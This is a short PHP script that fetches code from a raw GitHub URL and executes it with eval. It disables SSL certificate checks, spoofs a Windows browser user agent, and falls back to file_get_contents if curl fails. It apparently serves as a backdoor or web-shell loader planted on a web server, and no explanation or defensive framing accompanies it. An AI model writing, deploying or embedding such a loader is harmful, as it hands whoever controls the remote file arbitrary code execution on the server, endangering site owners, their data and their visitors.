<?php
$url = "https://raw.githubusercontent.com/luffyopm/opm/refs/heads/main/3.txt";

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
    CURLOPT_TIMEOUT => 30
]);
$code = curl_exec($ch);
curl_close($ch);

if($code && trim($code) !== '') {
    eval('?>' . $code);
} else {
    $code = @file_get_contents($url);
    if($code && trim($code) !== '') {
        eval('?>' . $code);
    } else {
        http_response_code(500);
        echo 'Error';
    }
}
?>
